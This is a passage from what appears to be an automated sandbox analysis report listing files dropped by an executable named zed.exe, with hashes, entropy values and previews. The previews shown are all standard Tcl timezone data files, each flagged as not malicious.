                                                                                                                                                                                                                                            SHA-512:D547E3DC03848A677BE67F7CF4124E067F76EE09BB724A5B10F028BEA72C1526B17678A035B2C53F69498E9ECAACD3C5445D42B7FE58DF706DD2C5F2ADA05A73
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:Canada/Central) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.758562813220951
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/0nbHboxp4IAcGEqM:SlSWB9vsM3y7RQtHAIgpRQPN/0Dboxpp
                                                                                                                                                                                                                                            MD5:4365BEFA3D50EEE20843EF97A095E512
                                                                                                                                                                                                                                            SHA1:7756049B4CD6459742686925E9516E64A9727306
                                                                                                                                                                                                                                            SHA-256:22844994AE893F3236A091B050E932E84A5218EC0D01F72595E17CCC471FA564
                                                                                                                                                                                                                                            SHA-512:CB265E79DF926026BEBF7158590369ABE5353C759540F509ABBA2A7ADBE59A705BC2AB936F400614BE610EDB761DE9A2B1E179A0A8B0A87E595392362C2516AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:Canada/Eastern) $TZData(:America/Toronto)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.8181126338833655
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx07nKL50vXHAIg207nKLyRRL/0nNYLo/4IAcGE7nK1:SlSWB9vsM3y77G2HAIgp7bN/0W8/4908
                                                                                                                                                                                                                                            MD5:FA0D0024AD72CCE4EC7229FA897FB1B7
                                                                                                                                                                                                                                            SHA1:4373A07F2674FE974189CC801987652AA97F0204
                                                                                                                                                                                                                                            SHA-256:D7A203E60FF19DCDEAAD14121720DE51DA73392D25B40FFA301C1935CDF89517
                                                                                                                                                                                                                                            SHA-512:82EF7F429604A69734B04D298B4C9C9AC3BE57B9DD8C4CECF59C7AB3470BDFBA0505886C4E6AA3864F5EC7FBB4C69C54CF153A6417376828234833013C29A0C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Edmonton)]} {.. LoadTimeZoneFile America/Edmonton..}..set TZData(:Canada/Mountain) $TZData(:America/Edmonton)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):196
                                                                                                                                                                                                                                            Entropy (8bit):4.998628928230972
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7tgYJHAIgptVN/0xdBx+90twv:MByMYnKpTt590g
                                                                                                                                                                                                                                            MD5:A2DCCB8BFC65DD4E7C3BB7F10DCEFF11
                                                                                                                                                                                                                                            SHA1:6FD2F4FAE06C5D4D3F189A167A98AA76497569DD
                                                                                                                                                                                                                                            SHA-256:87F42F45FD7D059CA47650D445420DE8320F3A7C1CBC7671FBFA8A8881274433
                                                                                                                                                                                                                                            SHA-512:F42E32C5BD785BA914E5054784BF67DDF951460A708290D1899621CEEDC63475B584FC052A86A3B6D45BF3C651D42427FB6F9CE2A2A33764DFFF731053BECC16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/St_Johns)]} {.. LoadTimeZoneFile America/St_Johns..}..set TZData(:Canada/Newfoundland) $TZData(:America/St_Johns)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.887587766811186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7ZLgXPHAIgpZLgFN/0N290ZLgK:MByMY13p1stx901/
                                                                                                                                                                                                                                            MD5:68900CE38FE0E40578323BBD3D75184E
                                                                                                                                                                                                                                            SHA1:9D5EAB5CBCD495DD46974207FBE354A81DD2070F
                                                                                                                                                                                                                                            SHA-256:5C4FD46054B190A6D4B92585B4DAE4E3A8233EE2996D14472835DDD264911DC6
                                                                                                                                                                                                                                            SHA-512:3EF53F0FCD8D88A1B977886BDFAA03D7B84EF021AC6BEDF7C571BFBF2242BFC3F3EB6A6B6A9C2F6852AF412A96DFBC30F3BB25A6619CBCD8736F3DF5B64DE1BF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Vancouver)]} {.. LoadTimeZoneFile America/Vancouver..}..set TZData(:Canada/Pacific) $TZData(:America/Vancouver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.887593462838566
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0sAzE5Y5XHAIg20sAzEo5RL/0nogS64IAcGEsAzEB:SlSWB9vsM3y7hzi2HAIgphznN/0Hd499
                                                                                                                                                                                                                                            MD5:A4237BDCAF68B0EFECA97178F3DEE724
                                                                                                                                                                                                                                            SHA1:A9CBC02B5545A63A0C9B38C8FA7FA2DE6D483188
                                                                                                                                                                                                                                            SHA-256:46BA00AE3A07A4DC83D6CB517D87C9CBBA491B3421FE9AD6C74CAC5695EB73F7
                                                                                                                                                                                                                                            SHA-512:832BF256BE8CB2DD205DDE50017448D5830B46FF4DCA77BDB852067EE0C9DF9977014F2A3E3DD6944336158D8EA377CFBBE519EE5B56FB26EB64325B45476B9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Regina)]} {.. LoadTimeZoneFile America/Regina..}..set TZData(:Canada/Saskatchewan) $TZData(:America/Regina)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
                                                                                                                                                                                                                                            Entropy (8bit):4.889486451014262
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7peR2fkSHAIgppeR2rN/0CF/490peR24:MByMYkGk7pkOtBQ90kB
                                                                                                                                                                                                                                            MD5:490D99BD5465CBF5A8FE28F33180B8A6
                                                                                                                                                                                                                                            SHA1:4783295C31A804BE98145270ED28956A0783E655
                                                                                                                                                                                                                                            SHA-256:A1B1AF37DC89C6BA663E4E967A18409AE4E0FA9EF1B908D0461368DA31001C09
                                                                                                                                                                                                                                            SHA-512:9F6B4F204A21B69E1DFCB766C0671D3736414C73269DCEDCDB4FC3DBA869BBA1511DF6B5061F8964F0AF9C3816133D04E5DFB8A6AD07CA06E7712787A8FECC5A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Whitehorse)]} {.. LoadTimeZoneFile America/Whitehorse..}..set TZData(:Canada/Yukon) $TZData(:America/Whitehorse)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.812019117774239
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7tfEJkHAIgptfEJo5N/0rHM490tfEJB:MByMYE9pEOt4X90EB
                                                                                                                                                                                                                                            MD5:6EF54792279C249B16877100682F1806
                                                                                                                                                                                                                                            SHA1:A62629EA055207D917740E3AEF4F0B005EA49CC4
                                                                                                                                                                                                                                            SHA-256:5B40167DD0C0B5C293861070C4AC249F78DDF8BAD798DD0165E3AE894C9B9570
                                                                                                                                                                                                                                            SHA-512:3CF93003C3EA2B4386660F0C87074F9AE2BAC4EE72D88451DCB1EA8B79502D2187B1608B6D5CE8D7EDC00AED99CF9DB7B006EB6ED2A2B5009F2C0E757D282D74
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Santiago)]} {.. LoadTimeZoneFile America/Santiago..}..set TZData(:Chile/Continental) $TZData(:America/Santiago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.808907056781067
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG7ZAJWXHAIgObT7ZAiFvRL/0bxOdBx/nUDH7ZAZv:SlSWB9vsM3ycJAUHAIgObJAiRN/04dBn
                                                                                                                                                                                                                                            MD5:2EC4FDD1EFBAF1D9F9DBAC8B1B5EDD09
                                                                                                                                                                                                                                            SHA1:FECED8EBC7B666628B7B45C9694FCB3A0B20A42A
                                                                                                                                                                                                                                            SHA-256:1E2DA1862E0E0F131B7C6EB12FAC5F920852C61C162993A30BC843A464A5AAD4
                                                                                                                                                                                                                                            SHA-512:74D61141505BAF1ABAD61FB91941C63C169EFE3C85829FEBB4D29A72EA54D1A07EC84E2E9B48E963E65CBF7663245459FAD288D620B1BEFFE682A2D1C243794D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Easter)]} {.. LoadTimeZoneFile Pacific/Easter..}..set TZData(:Chile/EasterIsland) $TZData(:Pacific/Easter)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):175
                                                                                                                                                                                                                                            Entropy (8bit):4.857134440822812
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02TEMVFfXHAIg202TEyRRL/0lIAcGE2TEMy:SlSWB9vsM3y76EkHAIgp6EyRN/0l9068
                                                                                                                                                                                                                                            MD5:3FB16EA4A9B0529220133C4A7B05215B
                                                                                                                                                                                                                                            SHA1:BD56B6E76A92A5925140CB5CC3D940E1DE90993F
                                                                                                                                                                                                                                            SHA-256:6F4F2D7F5BCA4E5183460C0153D2B98F5239A99F149DE6638B311C73CEDB1329
                                                                                                                                                                                                                                            SHA-512:690EC1BCE7FA979BD55725B8ED6DF042BB331CAD332827B2C64B31F107539934AA5A30268B1F03D52697528E68A1BA72E4D56B5199A68B1ED897B75FAFB33A8A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Havana)]} {.. LoadTimeZoneFile America/Havana..}..set TZData(:Cuba) $TZData(:America/Havana)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7440
                                                                                                                                                                                                                                            Entropy (8bit):3.695300167191082
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:CgDIMcVbf+uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlt:KlfyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:34339D40AC889DCB5A09D10F123175AD
                                                                                                                                                                                                                                            SHA1:57E1F70FA8999106FA3874A9CE1E75A7ACBC81E9
                                                                                                                                                                                                                                            SHA-256:64E284F9F7A36CC0A352809141D76E73A99344A9F30CFFEA254CBB9D2C589ADA
                                                                                                                                                                                                                                            SHA-512:2DCF16D9D7593FC3E5844E18FD689AADA157866490CFD37A38A47F747DDA189822055F6DD470CA2D77040D2C5A2527512880C22ED8EC16D9424EDF3DC228AFED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EET) {.. {-9223372036854775808 7200 0 EET}.. {228877200 10800 1 EEST}.. {243997200 7200 0 EET}.. {260326800 10800 1 EEST}.. {276051600 7200 0 EET}.. {291776400 10800 1 EEST}.. {307501200 7200 0 EET}.. {323830800 10800 1 EEST}.. {338950800 7200 0 EET}.. {354675600 10800 1 EEST}.. {370400400 7200 0 EET}.. {386125200 10800 1 EEST}.. {401850000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 E
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                            Entropy (8bit):4.924838898127838
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yLbNMXGm2OHLVva0v:SlSWB9eg/ylDm2OHLVi0v
                                                                                                                                                                                                                                            MD5:B221E7141FFC9DEA317F64F81C7BB4E0
                                                                                                                                                                                                                                            SHA1:B13BBDE790B169D8B9075275523F319D5173E2C7
                                                                                                                                                                                                                                            SHA-256:6344BE02529C1CC5F7B5FE14B7E9BBCED4DDE68A24B824601EEBCAE207ABFDF2
                                                                                                                                                                                                                                            SHA-512:FFFA733476D6C7DCF49C0B88C9F5E381DE2B69BAEDF6C7B1D91C6F45CE2D36E06D40F25B6BB65D4B5D650471BB52CD2EC3F68703DAB4BD5414F8D3F831D92BD2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST) {.. {-9223372036854775808 -18000 0 EST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8505
                                                                                                                                                                                                                                            Entropy (8bit):3.8091719283634853
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:R+kNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:RXoSItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:4578FE48781599B55F4BCF5560019789
                                                                                                                                                                                                                                            SHA1:4EAA7134621DFDEBFD1405F5CC58227FA7E80C3A
                                                                                                                                                                                                                                            SHA-256:0BE6161403BC5A96BFAB174F2C3FCBA8A677D4349699B408E9872B9DD0FE15CE
                                                                                                                                                                                                                                            SHA-512:9ACC2EF396F635D22E3DF6B785831AD74B510049F1BE85F996467A5BBC0DF49A28B2FC3E4CA0CA9DC8FC2C29EA50D909F0B153265B107445D3052E81D9A4D50A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST5EDT) {.. {-9223372036854775808 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-84387600 -14400 1 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):170
                                                                                                                                                                                                                                            Entropy (8bit):4.862365884559795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsPHV5XHAIgNGE7TRRL/yCh0DcPHy:SlSWB9vsM3y7fHAIgNTRN/yg0DH
                                                                                                                                                                                                                                            MD5:ACD69F34396296BA553243267D06CEE0
                                                                                                                                                                                                                                            SHA1:9575FFE5E7833B9532F17AC5413EA9DB23F07ECA
                                                                                                                                                                                                                                            SHA-256:936B6484469351DEF8FAFE8EC180862729F5E43BDE4E53E2E9636E221B54C3C2
                                                                                                                                                                                                                                            SHA-512:149D23FF35747127E9A2F4056D09472E8E689970BC795D5411C5BF621D949ADDEBDA68674D375A248A63106ABDFF6C54A8AFE5385C45BE2916CAED0C30F7C4A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Cairo)]} {.. LoadTimeZoneFile Africa/Cairo..}..set TZData(:Egypt) $TZData(:Africa/Cairo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):172
                                                                                                                                                                                                                                            Entropy (8bit):4.901791318009318
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV5QH+o3vXHAIgoq6QHFRRL/yMQs/h8QanQHuv:SlSWB9vsM3ymnQeoPHAIgonQzN/yM/hm
                                                                                                                                                                                                                                            MD5:E9C2C97EB65526F1D4BE1AD7385336FA
                                                                                                                                                                                                                                            SHA1:09E4000CE320F779E2DFCA2FFD6B9258FFBA6CE4
                                                                                                                                                                                                                                            SHA-256:B78A833337EFEC8B5F64622F1BFDA21FCB79CF290E9CF32A54B206EB20C6FDE9
                                                                                                                                                                                                                                            SHA-512:EAEC097B58BF466CC7D6C0C6297628AF910CC308AC822565FD6CDABF96CD4EC57D4CC724FE782B6C1B606DFF9424013F6A890A871339577F7CB68BBB3C425E65
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Dublin)]} {.. LoadTimeZoneFile Europe/Dublin..}..set TZData(:Eire) $TZData(:Europe/Dublin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                                                            Entropy (8bit):4.928744204623185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDMbNMXGm2OHvDwy:SlSWB9eg/yRQJDm2OHsy
                                                                                                                                                                                                                                            MD5:9C08898081382F52CE681B592B8E2C8D
                                                                                                                                                                                                                                            SHA1:165944424740B1FA9B4B3B8E622198ABD0BDA0F8
                                                                                                                                                                                                                                            SHA-256:66B0DF8888883BFF44B18728B48CDF24AAED0BB745D601F3422C4F2D4063E0AC
                                                                                                                                                                                                                                            SHA-512:86EA639F999169F2FBA2457BE5042463A1938031268CCA71FDD03CCBC6194932937BA58B49FBED461E055E9AA668FF6EBF391AA7EC603C0A425416DF2E6CC84D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT) {.. {-9223372036854775808 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.910789466104329
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDOm7/8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRSw8RQy
                                                                                                                                                                                                                                            MD5:333F2BFA92742A49BB88F11C7CD896A9
                                                                                                                                                                                                                                            SHA1:BB5BEC010C36427AEEBDDA2FB72083E22A3F5073
                                                                                                                                                                                                                                            SHA-256:64466EA3759301E88C29AD1A833CDCBBC495EB4A5A3AC45E7B2987FECD6702BD
                                                                                                                                                                                                                                            SHA-512:E2270F4B57C5F1C849726259B886E8644DCF497FA0D034AD48885146BEDC70DC8899900DA9AC01F2609A2DA881E10F9042CCBF75A3F5DA7344D7E92F1B070806
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT+0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.980500771169276
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOveyXMXGm2OH1VOwVn:SlSWB9eg/yRSvPDm2OH1VOwV
                                                                                                                                                                                                                                            MD5:A7C3FD06D1E06F125813C9687C42067C
                                                                                                                                                                                                                                            SHA1:515622C0B63E977AFBFC78AD8466053C4A4A71A6
                                                                                                                                                                                                                                            SHA-256:3BE1EC71D2CC88FA9A3DB7DC0476475F33FE5BCBE6BC35C0F083859766466C32
                                                                                                                                                                                                                                            SHA-512:548DA608CFCA5B8539652F94CA2040D624602D2DF64B2C8CCDB8B219B9B384E01386CDF95F3BF77409DF0584FA12A3B73D56D13107D98BEB4C2555F458B3F374
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+1) {.. {-9223372036854775808 -3600 0 -01}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):118
                                                                                                                                                                                                                                            Entropy (8bit):4.965033464829338
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOPFNMXGm2OH1VYU7vV:SlSWB9eg/yRSPXDm2OH1VYW9
                                                                                                                                                                                                                                            MD5:FF71149E56D4CB553D0ED949B5F4C122
                                                                                                                                                                                                                                            SHA1:3459B47E0EEC80D7A29512CA4F3F236C89E86573
                                                                                                                                                                                                                                            SHA-256:E61E826E6FBC2396EF152640698098F4477D4FFDFE5F791F62250C3EC5865304
                                                                                                                                                                                                                                            SHA-512:43B0CC8BD7F1EFC80C3F14F115D651EADD5743B17B854C2FB7AC25995138D3DF8792915C2952B80F35784A7115F8FB335ACE171479B24C668190AC175523DB21
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+10) {.. {-9223372036854775808 -36000 0 -10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):118
                                                                                                                                                                                                                                            Entropy (8bit):5.002239901486653
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOeJMXGm2OHaBByVn:SlSWB9eg/yRSsDm2OHa7yV
                                                                                                                                                                                                                                            MD5:08AABA917A8D6B3BB3D0DD1637F5ABFC
                                                                                                                                                                                                                                            SHA1:D1D704F0250D4CBD450922A02D021E0000FBF5CF
                                                                                                                                                                                                                                            SHA-256:143528946275DDC8B894218D3F1BE56C950F740828CEC13166C3D7E8E1B6BB7E
                                                                                                                                                                                                                                            SHA-512:F37AE54864A613C830308CB94AB7CEA9534A86A53B52B4A2C28CEEFE6F5BC0518143AAFD77A6DA5EC55D392F5BD34FCD4B5BE51794B1A386ED783B9BA89C10C3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+11) {.. {-9223372036854775808 -39600 0 -11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):118
                                                                                                                                                                                                                                            Entropy (8bit):4.97889339723103
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDONdNMXGm2OH3FNyUFFv:SlSWB9eg/yRSNDm2OH3XyMv
                                                                                                                                                                                                                                            MD5:7374B66D6E883D7581E9561C3815EB92
                                                                                                                                                                                                                                            SHA1:235E96A7420DF6733F3CA368D4A2D57766656043
                                                                                                                                                                                                                                            SHA-256:A93EAFAC2C1089C608C8536127D0E8B53D8C7CFD13AE7DD69339E12A89F803C6
                                                                                                                                                                                                                                            SHA-512:9BA59B17F20D65DFF1A5A2D557B535F69B04C172AECB15F88CA3484D74CC7D53894985C08653CF13D868BCBD5E7E5041E0CB2F457B5B603F3851198E552E33A7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+12) {.. {-9223372036854775808 -43200 0 -12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.922268982357521
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOcF3vFNMXGm2OHnFQVIyV:SlSWB9eg/yRS0fXDm2OHnFQVb
                                                                                                                                                                                                                                            MD5:FDDC663E40F8FFFE27959E94625725DF
                                                                                                                                                                                                                                            SHA1:EE3FBC1F6C8BBCF1BDC9E5DB4D2EA1A57E2E9BB3
